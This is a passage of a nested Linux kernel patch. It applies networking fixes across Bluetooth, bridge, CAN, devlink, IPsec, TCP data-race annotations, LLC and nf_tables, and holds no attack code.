+-	list_del_init(&params->action);
++	hci_pend_le_list_del_init(params);
+ 
+ 	switch (auto_connect) {
+ 	case HCI_AUTO_CONN_DISABLED:
+@@ -7582,18 +7582,18 @@ static int hci_conn_params_set(struct hci_dev *hdev, bdaddr_t *addr,
+ 		 * connect to device, keep connecting.
+ 		 */
+ 		if (params->explicit_connect)
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	case HCI_AUTO_CONN_REPORT:
+ 		if (params->explicit_connect)
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		else
+-			list_add(&params->action, &hdev->pend_le_reports);
++			hci_pend_le_list_add(params, &hdev->pend_le_reports);
+ 		break;
+ 	case HCI_AUTO_CONN_DIRECT:
+ 	case HCI_AUTO_CONN_ALWAYS:
+ 		if (!is_connected(hdev, addr, addr_type))
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	}
+ 
+@@ -7816,9 +7816,7 @@ static int remove_device(struct sock *sk, struct hci_dev *hdev,
+ 			goto unlock;
+ 		}
+ 
+-		list_del(&params->action);
+-		list_del(&params->list);
+-		kfree(params);
++		hci_conn_params_free(params);
+ 
+ 		device_removed(sk, hdev, &cp->addr.bdaddr, cp->addr.type);
+ 	} else {
+@@ -7849,9 +7847,7 @@ static int remove_device(struct sock *sk, struct hci_dev *hdev,
+ 				p->auto_connect = HCI_AUTO_CONN_EXPLICIT;
+ 				continue;
+ 			}
+-			list_del(&p->action);
+-			list_del(&p->list);
+-			kfree(p);
++			hci_conn_params_free(p);
+ 		}
+ 
+ 		bt_dev_dbg(hdev, "All LE connection parameters were removed");
+diff --git a/net/bridge/br_stp_if.c b/net/bridge/br_stp_if.c
+index 75204d36d7f90..b65962682771f 100644
+--- a/net/bridge/br_stp_if.c
++++ b/net/bridge/br_stp_if.c
+@@ -201,6 +201,9 @@ int br_stp_set_enabled(struct net_bridge *br, unsigned long val,
+ {
+ 	ASSERT_RTNL();
+ 
++	if (!net_eq(dev_net(br->dev), &init_net))
++		NL_SET_ERR_MSG_MOD(extack, "STP does not work in non-root netns");
++
+ 	if (br_mrp_enabled(br)) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "STP can't be enabled if MRP is already enabled");
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index a962ec2b8ba5b..925d48cc50f81 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -1526,6 +1526,12 @@ static int bcm_release(struct socket *sock)
+ 
+ 	lock_sock(sk);
+ 
++#if IS_ENABLED(CONFIG_PROC_FS)
++	/* remove procfs entry */
++	if (net->can.bcmproc_dir && bo->bcm_proc_read)
++		remove_proc_entry(bo->procname, net->can.bcmproc_dir);
++#endif /* CONFIG_PROC_FS */
++
+ 	list_for_each_entry_safe(op, next, &bo->tx_ops, list)
+ 		bcm_remove_op(op);
+ 
+@@ -1561,12 +1567,6 @@ static int bcm_release(struct socket *sock)
+ 	list_for_each_entry_safe(op, next, &bo->rx_ops, list)
+ 		bcm_remove_op(op);
+ 
+-#if IS_ENABLED(CONFIG_PROC_FS)
+-	/* remove procfs entry */
+-	if (net->can.bcmproc_dir && bo->bcm_proc_read)
+-		remove_proc_entry(bo->procname, net->can.bcmproc_dir);
+-#endif /* CONFIG_PROC_FS */
+-
+ 	/* remove device reference */
+ 	if (bo->bound) {
+ 		bo->bound   = 0;
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+index 2aa77d4b80d0a..5a4a4b34ac15c 100644
+--- a/net/core/devlink.c
++++ b/net/core/devlink.c
+@@ -9826,7 +9826,10 @@ EXPORT_SYMBOL_GPL(devlink_free);
+ 
+ static void devlink_port_type_warn(struct work_struct *work)
+ {
+-	WARN(true, "Type was not set for devlink port.");
++	struct devlink_port *port = container_of(to_delayed_work(work),
++						 struct devlink_port,
++						 type_warn_dw);
++	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
+ }
+ 
+ static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index 52c8047efedbb..2d094d417ecae 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -1132,7 +1132,7 @@ static int esp_init_authenc(struct xfrm_state *x,
+ 	err = crypto_aead_setkey(aead, key, keylen);
+ 
+ free_key:
+-	kfree(key);
++	kfree_sensitive(key);
+ 
+ error:
+ 	return err;
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 8e35ea66d930a..62a3b103f258a 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1016,7 +1016,7 @@ static void reqsk_timer_handler(struct timer_list *t)
+ 
+ 	icsk = inet_csk(sk_listener);
+ 	net = sock_net(sk_listener);
+-	max_syn_ack_retries = icsk->icsk_syn_retries ? :
++	max_syn_ack_retries = READ_ONCE(icsk->icsk_syn_retries) ? :
+ 		READ_ONCE(net->ipv4.sysctl_tcp_synack_retries);
+ 	/* Normally all the openreqs are young and become mature
+ 	 * (i.e. converted to established socket) for first timeout.
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index e8734ffca85a8..c19b462662ad0 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -650,20 +650,8 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	spin_lock(lock);
+ 	if (osk) {
+ 		WARN_ON_ONCE(sk->sk_hash != osk->sk_hash);
+-		ret = sk_hashed(osk);
+-		if (ret) {
+-			/* Before deleting the node, we insert a new one to make
+-			 * sure that the look-up-sk process would not miss either
+-			 * of them and that at least one node would exist in ehash
+-			 * table all the time. Otherwise there's a tiny chance
+-			 * that lookup process could find nothing in ehash table.
+-			 */
+-			__sk_nulls_add_node_tail_rcu(sk, list);
+-			sk_nulls_del_node_init_rcu(osk);
+-		}
+-		goto unlock;
+-	}
+-	if (found_dup_sk) {
++		ret = sk_nulls_del_node_init_rcu(osk);
++	} else if (found_dup_sk) {
+ 		*found_dup_sk = inet_ehash_lookup_by_sk(sk, list);
+ 		if (*found_dup_sk)
+ 			ret = false;
+@@ -672,7 +660,6 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	if (ret)
+ 		__sk_nulls_add_node_rcu(sk, list);
+ 
+-unlock:
+ 	spin_unlock(lock);
+ 
+ 	return ret;
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index beed32fff4841..1d77d992e6e77 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -91,10 +91,10 @@ void inet_twsk_put(struct inet_timewait_sock *tw)
+ }
+ EXPORT_SYMBOL_GPL(inet_twsk_put);
+ 
+-static void inet_twsk_add_node_tail_rcu(struct inet_timewait_sock *tw,
+-					struct hlist_nulls_head *list)
++static void inet_twsk_add_node_rcu(struct inet_timewait_sock *tw,
++				   struct hlist_nulls_head *list)
+ {
+-	hlist_nulls_add_tail_rcu(&tw->tw_node, list);
++	hlist_nulls_add_head_rcu(&tw->tw_node, list);
+ }
+ 
+ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+@@ -147,7 +147,7 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 
+ 	spin_lock(lock);
+ 
+-	inet_twsk_add_node_tail_rcu(tw, &ehead->chain);
++	inet_twsk_add_node_rcu(tw, &ehead->chain);
+ 
+ 	/* Step 3: Remove SK from hash chain */
+ 	if (__sk_nulls_del_node_init_rcu(sk))
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 2a07588265c70..7b4ab545c06e0 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1691,7 +1691,7 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 			   const struct ip_options *sopt,
+ 			   __be32 daddr, __be32 saddr,
+ 			   const struct ip_reply_arg *arg,
+-			   unsigned int len, u64 transmit_time)
++			   unsigned int len, u64 transmit_time, u32 txhash)
+ {
+ 	struct ip_options_data replyopts;
+ 	struct ipcm_cookie ipc;
+@@ -1754,6 +1754,8 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 								arg->csum));
+ 		nskb->ip_summed = CHECKSUM_NONE;
+ 		nskb->mono_delivery_time = !!transmit_time;
++		if (txhash)
++			skb_set_hash(nskb, txhash, PKT_HASH_TYPE_L4);
+ 		ip_push_pending_frames(sk, &fl4);
+ 	}
+ out:
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 0bd0be3c63d22..fab25d4f3a6f1 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3397,7 +3397,7 @@ int tcp_sock_set_syncnt(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	inet_csk(sk)->icsk_syn_retries = val;
++	WRITE_ONCE(inet_csk(sk)->icsk_syn_retries, val);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3406,7 +3406,7 @@ EXPORT_SYMBOL(tcp_sock_set_syncnt);
+ void tcp_sock_set_user_timeout(struct sock *sk, u32 val)
+ {
+ 	lock_sock(sk);
+-	inet_csk(sk)->icsk_user_timeout = val;
++	WRITE_ONCE(inet_csk(sk)->icsk_user_timeout, val);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(tcp_sock_set_user_timeout);
+@@ -3418,7 +3418,8 @@ int tcp_sock_set_keepidle_locked(struct sock *sk, int val)
+ 	if (val < 1 || val > MAX_TCP_KEEPIDLE)
+ 		return -EINVAL;
+ 
+-	tp->keepalive_time = val * HZ;
++	/* Paired with WRITE_ONCE() in keepalive_time_when() */
++	WRITE_ONCE(tp->keepalive_time, val * HZ);
+ 	if (sock_flag(sk, SOCK_KEEPOPEN) &&
+ 	    !((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN))) {
+ 		u32 elapsed = keepalive_time_elapsed(tp);
+@@ -3450,7 +3451,7 @@ int tcp_sock_set_keepintvl(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	tcp_sk(sk)->keepalive_intvl = val * HZ;
++	WRITE_ONCE(tcp_sk(sk)->keepalive_intvl, val * HZ);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3462,7 +3463,8 @@ int tcp_sock_set_keepcnt(struct sock *sk, int val)
+ 		return -EINVAL;
+ 
+ 	lock_sock(sk);
+-	tcp_sk(sk)->keepalive_probes = val;
++	/* Paired with READ_ONCE() in keepalive_probes() */
++	WRITE_ONCE(tcp_sk(sk)->keepalive_probes, val);
+ 	release_sock(sk);
+ 	return 0;
+ }
+@@ -3664,19 +3666,19 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (val < 1 || val > MAX_TCP_KEEPINTVL)
+ 			err = -EINVAL;
+ 		else
+-			tp->keepalive_intvl = val * HZ;
++			WRITE_ONCE(tp->keepalive_intvl, val * HZ);
+ 		break;
+ 	case TCP_KEEPCNT:
+ 		if (val < 1 || val > MAX_TCP_KEEPCNT)
+ 			err = -EINVAL;
+ 		else
+-			tp->keepalive_probes = val;
++			WRITE_ONCE(tp->keepalive_probes, val);
+ 		break;
+ 	case TCP_SYNCNT:
+ 		if (val < 1 || val > MAX_TCP_SYNCNT)
+ 			err = -EINVAL;
+ 		else
+-			icsk->icsk_syn_retries = val;
++			WRITE_ONCE(icsk->icsk_syn_retries, val);
+ 		break;
+ 
+ 	case TCP_SAVE_SYN:
+@@ -3689,18 +3691,18 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case TCP_LINGER2:
+ 		if (val < 0)
+-			tp->linger2 = -1;
++			WRITE_ONCE(tp->linger2, -1);
+ 		else if (val > TCP_FIN_TIMEOUT_MAX / HZ)
+-			tp->linger2 = TCP_FIN_TIMEOUT_MAX;
++			WRITE_ONCE(tp->linger2, TCP_FIN_TIMEOUT_MAX);
+ 		else
+-			tp->linger2 = val * HZ;
++			WRITE_ONCE(tp->linger2, val * HZ);
+ 		break;
+ 
+ 	case TCP_DEFER_ACCEPT:
+ 		/* Translate value in seconds to number of retransmits */
+-		icsk->icsk_accept_queue.rskq_defer_accept =
+-			secs_to_retrans(val, TCP_TIMEOUT_INIT / HZ,
+-					TCP_RTO_MAX / HZ);
++		WRITE_ONCE(icsk->icsk_accept_queue.rskq_defer_accept,
++			   secs_to_retrans(val, TCP_TIMEOUT_INIT / HZ,
++					   TCP_RTO_MAX / HZ));
+ 		break;
+ 
+ 	case TCP_WINDOW_CLAMP:
+@@ -3724,7 +3726,7 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (val < 0)
+ 			err = -EINVAL;
+ 		else
+-			icsk->icsk_user_timeout = val;
++			WRITE_ONCE(icsk->icsk_user_timeout, val);
+ 		break;
+ 
+ 	case TCP_FASTOPEN:
+@@ -3762,13 +3764,13 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 		if (!tp->repair)
+ 			err = -EPERM;
+ 		else
+-			tp->tsoffset = val - tcp_time_stamp_raw();
++			WRITE_ONCE(tp->tsoffset, val - tcp_time_stamp_raw());
+ 		break;
+ 	case TCP_REPAIR_WINDOW:
+ 		err = tcp_repair_set_window(tp, optval, optlen);
+ 		break;
+ 	case TCP_NOTSENT_LOWAT:
+-		tp->notsent_lowat = val;
++		WRITE_ONCE(tp->notsent_lowat, val);
+ 		sk->sk_write_space(sk);
+ 		break;
+ 	case TCP_INQ:
+@@ -3780,7 +3782,7 @@ int do_tcp_setsockopt(struct sock *sk, int level, int optname,
+ 	case TCP_TX_DELAY:
+ 		if (val)
+ 			tcp_enable_tx_delay();
+-		tp->tcp_tx_delay = val;
++		WRITE_ONCE(tp->tcp_tx_delay, val);
+ 		break;
+ 	default:
+ 		err = -ENOPROTOOPT;
+@@ -4093,17 +4095,18 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		val = keepalive_probes(tp);
+ 		break;
+ 	case TCP_SYNCNT:
+-		val = icsk->icsk_syn_retries ? :
++		val = READ_ONCE(icsk->icsk_syn_retries) ? :
+ 			READ_ONCE(net->ipv4.sysctl_tcp_syn_retries);
+ 		break;
+ 	case TCP_LINGER2:
+-		val = tp->linger2;
++		val = READ_ONCE(tp->linger2);
+ 		if (val >= 0)
+ 			val = (val ? : READ_ONCE(net->ipv4.sysctl_tcp_fin_timeout)) / HZ;
+ 		break;
+ 	case TCP_DEFER_ACCEPT:
+-		val = retrans_to_secs(icsk->icsk_accept_queue.rskq_defer_accept,
+-				      TCP_TIMEOUT_INIT / HZ, TCP_RTO_MAX / HZ);
++		val = READ_ONCE(icsk->icsk_accept_queue.rskq_defer_accept);
++		val = retrans_to_secs(val, TCP_TIMEOUT_INIT / HZ,
++				      TCP_RTO_MAX / HZ);
+ 		break;
+ 	case TCP_WINDOW_CLAMP:
+ 		val = tp->window_clamp;
+@@ -4240,11 +4243,11 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		break;
+ 
+ 	case TCP_USER_TIMEOUT:
+-		val = icsk->icsk_user_timeout;
++		val = READ_ONCE(icsk->icsk_user_timeout);
+ 		break;
+ 
+ 	case TCP_FASTOPEN:
+-		val = icsk->icsk_accept_queue.fastopenq.max_qlen;
++		val = READ_ONCE(icsk->icsk_accept_queue.fastopenq.max_qlen);
+ 		break;
+ 
+ 	case TCP_FASTOPEN_CONNECT:
+@@ -4256,14 +4259,14 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 		break;
+ 
+ 	case TCP_TX_DELAY:
+-		val = tp->tcp_tx_delay;
++		val = READ_ONCE(tp->tcp_tx_delay);
+ 		break;
+ 
+ 	case TCP_TIMESTAMP:
+-		val = tcp_time_stamp_raw() + tp->tsoffset;
++		val = tcp_time_stamp_raw() + READ_ONCE(tp->tsoffset);
+ 		break;
+ 	case TCP_NOTSENT_LOWAT:
+-		val = tp->notsent_lowat;
++		val = READ_ONCE(tp->notsent_lowat);
+ 		break;
+ 	case TCP_INQ:
+ 		val = tp->recvmsg_inq;
+diff --git a/net/ipv4/tcp_fastopen.c b/net/ipv4/tcp_fastopen.c
+index 45cc7f1ca2961..85e4953f11821 100644
+--- a/net/ipv4/tcp_fastopen.c
++++ b/net/ipv4/tcp_fastopen.c
+@@ -296,6 +296,7 @@ static struct sock *tcp_fastopen_create_child(struct sock *sk,
+ static bool tcp_fastopen_queue_check(struct sock *sk)
+ {
+ 	struct fastopen_queue *fastopenq;
++	int max_qlen;
+ 
+ 	/* Make sure the listener has enabled fastopen, and we don't
+ 	 * exceed the max # of pending TFO requests allowed before trying
+@@ -308,10 +309,11 @@ static bool tcp_fastopen_queue_check(struct sock *sk)
+ 	 * temporarily vs a server not supporting Fast Open at all.
+ 	 */
+ 	fastopenq = &inet_csk(sk)->icsk_accept_queue.fastopenq;
+-	if (fastopenq->max_qlen == 0)
++	max_qlen = READ_ONCE(fastopenq->max_qlen);
++	if (max_qlen == 0)
+ 		return false;
+ 
+-	if (fastopenq->qlen >= fastopenq->max_qlen) {
++	if (fastopenq->qlen >= max_qlen) {
+ 		struct request_sock *req1;
+ 		spin_lock(&fastopenq->lock);
+ 		req1 = fastopenq->rskq_rst_head;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index b37c1bcb15097..9a8d59e9303a0 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -307,8 +307,9 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 						  inet->inet_daddr,
+ 						  inet->inet_sport,
+ 						  usin->sin_port));
+-		tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
+-						 inet->inet_daddr);
++		WRITE_ONCE(tp->tsoffset,
++			   secure_tcp_ts_off(net, inet->inet_saddr,
++					     inet->inet_daddr));
+ 	}
+ 
+ 	inet->inet_id = get_random_u16();
+@@ -692,6 +693,7 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 	u64 transmit_time = 0;
+ 	struct sock *ctl_sk;
+ 	struct net *net;
++	u32 txhash = 0;
+ 
+ 	/* Never send a reset in response to a reset. */
+ 	if (th->rst)
+@@ -829,6 +831,8 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 				   inet_twsk(sk)->tw_priority : sk->sk_priority;
+ 		transmit_time = tcp_transmit_time(sk);
+ 		xfrm_sk_clone_policy(ctl_sk, sk);
++		txhash = (sk->sk_state == TCP_TIME_WAIT) ?
++			 inet_twsk(sk)->tw_txhash : sk->sk_txhash;
+ 	} else {
+ 		ctl_sk->sk_mark = 0;
+ 		ctl_sk->sk_priority = 0;
+@@ -837,7 +841,7 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+ 			      ip_hdr(skb)->saddr, ip_hdr(skb)->daddr,
+ 			      &arg, arg.iov[0].iov_len,
+-			      transmit_time);
++			      transmit_time, txhash);
+ 
+ 	xfrm_sk_free_policy(ctl_sk);
+ 	sock_net_set(ctl_sk, &init_net);
+@@ -859,7 +863,7 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			    struct sk_buff *skb, u32 seq, u32 ack,
+ 			    u32 win, u32 tsval, u32 tsecr, int oif,
+ 			    struct tcp_md5sig_key *key,
+-			    int reply_flags, u8 tos)
++			    int reply_flags, u8 tos, u32 txhash)
+ {
+ 	const struct tcphdr *th = tcp_hdr(skb);
+ 	struct {
+@@ -935,7 +939,7 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+ 			      ip_hdr(skb)->saddr, ip_hdr(skb)->daddr,
+ 			      &arg, arg.iov[0].iov_len,
+-			      transmit_time);
++			      transmit_time, txhash);
+ 
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+@@ -955,7 +959,8 @@ static void tcp_v4_timewait_ack(struct sock *sk, struct sk_buff *skb)
+ 			tw->tw_bound_dev_if,
+ 			tcp_twsk_md5_key(tcptw),
+ 			tw->tw_transparent ? IP_REPLY_ARG_NOSRCCHECK : 0,
+-			tw->tw_tos
++			tw->tw_tos,
++			tw->tw_txhash
+ 			);
+ 
+ 	inet_twsk_put(tw);
+@@ -984,11 +989,12 @@ static void tcp_v4_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_rsk(req)->rcv_nxt,
+ 			req->rsk_rcv_wnd >> inet_rsk(req)->rcv_wscale,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+-			req->ts_recent,
++			READ_ONCE(req->ts_recent),
+ 			0,
+ 			tcp_md5_do_lookup(sk, l3index, addr, AF_INET),
+ 			inet_rsk(req)->no_srccheck ? IP_REPLY_ARG_NOSRCCHECK : 0,
+-			ip_hdr(skb)->tos);
++			ip_hdr(skb)->tos,
++			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+ /*
+@@ -2911,7 +2917,6 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 	struct bpf_iter_meta meta;
+ 	struct bpf_prog *prog;
+ 	struct sock *sk = v;
+-	bool slow;
+ 	uid_t uid;
+ 	int ret;
+ 
+@@ -2919,7 +2924,7 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 		return 0;
+ 
+ 	if (sk_fullsock(sk))
+-		slow = lock_sock_fast(sk);
++		lock_sock(sk);
+ 
+ 	if (unlikely(sk_unhashed(sk))) {
+ 		ret = SEQ_SKIP;
+@@ -2943,7 +2948,7 @@ static int bpf_iter_tcp_seq_show(struct seq_file *seq, void *v)
+ 
+ unlock:
+ 	if (sk_fullsock(sk))
+-		unlock_sock_fast(sk, slow);
++		release_sock(sk);
+ 	return ret;
+ 
+ }
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index 7f37e7da64671..42844d20da020 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -510,7 +510,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
+ 	newicsk->icsk_ack.lrcvtime = tcp_jiffies32;
+ 
+ 	newtp->lsndtime = tcp_jiffies32;
+-	newsk->sk_txhash = treq->txhash;
++	newsk->sk_txhash = READ_ONCE(treq->txhash);
+ 	newtp->total_retrans = req->num_retrans;
+ 
+ 	tcp_init_xmit_timers(newsk);
+@@ -537,7 +537,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
+ 	newtp->max_window = newtp->snd_wnd;
+ 
+ 	if (newtp->rx_opt.tstamp_ok) {
+-		newtp->rx_opt.ts_recent = req->ts_recent;
++		newtp->rx_opt.ts_recent = READ_ONCE(req->ts_recent);
+ 		newtp->rx_opt.ts_recent_stamp = ktime_get_seconds();
+ 		newtp->tcp_header_len = sizeof(struct tcphdr) + TCPOLEN_TSTAMP_ALIGNED;
+ 	} else {
+@@ -601,7 +601,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 		tcp_parse_options(sock_net(sk), skb, &tmp_opt, 0, NULL);
+ 
+ 		if (tmp_opt.saw_tstamp) {
+-			tmp_opt.ts_recent = req->ts_recent;
++			tmp_opt.ts_recent = READ_ONCE(req->ts_recent);
+ 			if (tmp_opt.rcv_tsecr)
+ 				tmp_opt.rcv_tsecr -= tcp_rsk(req)->ts_off;
+ 			/* We do not store true stamp, but it is not required,
+@@ -740,8 +740,11 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 
+ 	/* In sequence, PAWS is OK. */
+ 
++	/* TODO: We probably should defer ts_recent change once
++	 * we take ownership of @req.
++	 */
+ 	if (tmp_opt.saw_tstamp && !after(TCP_SKB_CB(skb)->seq, tcp_rsk(req)->rcv_nxt))
+-		req->ts_recent = tmp_opt.rcv_tsval;
++		WRITE_ONCE(req->ts_recent, tmp_opt.rcv_tsval);
+ 
+ 	if (TCP_SKB_CB(skb)->seq == tcp_rsk(req)->rcv_isn) {
+ 		/* Truncate SYN, it is out of window starting
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 925594dbeb929..26bd039f9296f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -876,7 +876,7 @@ static unsigned int tcp_synack_options(const struct sock *sk,
+ 	if (likely(ireq->tstamp_ok)) {
+ 		opts->options |= OPTION_TS;
+ 		opts->tsval = tcp_skb_timestamp(skb) + tcp_rsk(req)->ts_off;
+-		opts->tsecr = req->ts_recent;
++		opts->tsecr = READ_ONCE(req->ts_recent);
+ 		remaining -= TCPOLEN_TSTAMP_ALIGNED;
+ 	}
+ 	if (likely(ireq->sack_ok)) {
+@@ -3581,7 +3581,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	rcu_read_lock();
+ 	md5 = tcp_rsk(req)->af_specific->req_md5_lookup(sk, req_to_sk(req));
+ #endif
+-	skb_set_hash(skb, tcp_rsk(req)->txhash, PKT_HASH_TYPE_L4);
++	skb_set_hash(skb, READ_ONCE(tcp_rsk(req)->txhash), PKT_HASH_TYPE_L4);
+ 	/* bpf program will be interested in the tcp_flags */
+ 	TCP_SKB_CB(skb)->tcp_flags = TCPHDR_SYN | TCPHDR_ACK;
+ 	tcp_header_size = tcp_synack_options(sk, req, mss, skb, &opts, md5,
+@@ -4124,7 +4124,7 @@ int tcp_rtx_synack(const struct sock *sk, struct request_sock *req)
+ 
+ 	/* Paired with WRITE_ONCE() in sock_setsockopt() */
+ 	if (READ_ONCE(sk->sk_txrehash) == SOCK_TXREHASH_ENABLED)
+-		tcp_rsk(req)->txhash = net_tx_rndhash();
++		WRITE_ONCE(tcp_rsk(req)->txhash, net_tx_rndhash());
+ 	res = af_ops->send_synack(sk, NULL, &fl, req, NULL, TCP_SYNACK_NORMAL,
+ 				  NULL);
+ 	if (!res) {
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 216b40ccadae0..d3fba7d8dec4e 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -977,7 +977,8 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		goto tx_err;
+ 
+ 	if (skb->len > dev->mtu + dev->hard_header_len) {
+-		pskb_trim(skb, dev->mtu + dev->hard_header_len);
++		if (pskb_trim(skb, dev->mtu + dev->hard_header_len))
++			goto tx_err;
+ 		truncate = true;
+ 	}
+ 
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 8d61efeab9c99..d9253aa764fae 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1130,10 +1130,10 @@ static void tcp_v6_reqsk_send_ack(const struct sock *sk, struct sk_buff *skb,
+ 			tcp_rsk(req)->rcv_nxt,
+ 			req->rsk_rcv_wnd >> inet_rsk(req)->rcv_wscale,
+ 			tcp_time_stamp_raw() + tcp_rsk(req)->ts_off,
+-			req->ts_recent, sk->sk_bound_dev_if,
++			READ_ONCE(req->ts_recent), sk->sk_bound_dev_if,
+ 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->saddr, l3index),
+ 			ipv6_get_dsfield(ipv6_hdr(skb)), 0, sk->sk_priority,
+-			tcp_rsk(req)->txhash);
++			READ_ONCE(tcp_rsk(req)->txhash));
+ }
+ 
+ 
+diff --git a/net/llc/llc_input.c b/net/llc/llc_input.c
+index c309b72a58779..7cac441862e21 100644
+--- a/net/llc/llc_input.c
++++ b/net/llc/llc_input.c
+@@ -163,9 +163,6 @@ int llc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	void (*sta_handler)(struct sk_buff *skb);
+ 	void (*sap_handler)(struct llc_sap *sap, struct sk_buff *skb);
+ 
+-	if (!net_eq(dev_net(dev), &init_net))
+-		goto drop;
+-
+ 	/*
+ 	 * When the interface is in promisc. mode, drop all the crap that it
+ 	 * receives, do not try to analyse it.
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 938cfa9a3adb6..ecde497368ec4 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3500,8 +3500,6 @@ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain)
+ 			if (err < 0)
+ 				return err;
+ 		}
+-
+-		cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -3525,6 +3523,8 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 		err = nft_chain_validate(&ctx, chain);
+ 		if (err < 0)
+ 			return err;
++
++		cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -3892,6 +3892,8 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		list_for_each_entry(chain, &table->chains, list) {
+ 			if (!nft_is_active_next(net, chain))
+ 				continue;
++			if (nft_chain_is_bound(chain))
++				continue;
+ 
+ 			ctx.chain = chain;
+ 			err = nft_delrule_by_chain(&ctx);
